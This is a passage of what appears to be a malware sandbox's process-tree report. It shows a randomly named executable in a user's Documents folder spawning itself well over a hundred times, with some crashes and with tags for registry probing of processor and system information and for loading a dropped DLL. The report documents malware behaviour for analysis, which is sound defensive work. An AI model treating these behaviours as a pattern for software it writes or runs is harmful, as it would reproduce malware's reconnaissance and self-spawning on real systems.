C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9492

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9048

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:7532

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:3972

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:10288

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:10940

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:10508

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11076

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:3504

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11144

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11828

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:12212

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11752

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9608

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:7676

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:2268

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:6088

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:10612

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:2468

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:10648

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13280

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:12380

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11564

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9268

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:8104

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13176

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:14068

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:6276

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13380

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:3976

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5968

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:10300

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13552

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:1552

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:14652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 14652 -s 28
13⤵
- Program crash
PID:14976

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:14400

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:14316

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:14440

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9252

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:1544

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:12492

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:14544

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:15832

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:580

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:6852

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:10352

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13172

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11100

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:15764

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:2992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 28
13⤵
- Program crash
PID:17080

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:15164

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:16820

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9968

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:16704

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:17512

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18304

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18320

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18228

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:17896

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:17760

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18696

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19168

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11248

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19148

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18580

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13240

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18940

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19208

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18580

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13096

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19516

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:20384

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:20084

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:6872

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:20148

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:20232

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:20348

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11728

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:21160

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:21120

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:16656

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13928

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:17192

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:14328

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18880

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18244

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:21912

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13772

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:11916

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:23548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 23548 -s 28
13⤵
- Program crash
PID:23424

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:22648

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:21352

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:12320

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:23252

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:8176

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:7344

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:23428

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:24476

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:24252

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:24364

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19116

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:13800

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:20132

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:24304

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:23868

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:24764

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25564

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25284

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18752

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:3156

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:17188

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:24896

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:14104

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:12968

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:22824

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:18248

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:5096

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:15208

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19876

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:22720

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26228

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:10156

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9764

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25812

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:20768

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:6876

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25792

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26740

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25544

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27316

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26696

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26576

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:21760

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:23268

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27608

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:24384

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27724

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27408

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:23964

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:28156

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27700

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26388

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 25248 -s 28
13⤵
- Program crash
PID:16204

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:23648

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26640

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25260

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:28716

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25292

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:29500

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:28880

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:29084

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:26884

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:25996

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
- Loads dropped DLL
PID:6028

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:27476

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:30364

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:19720

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
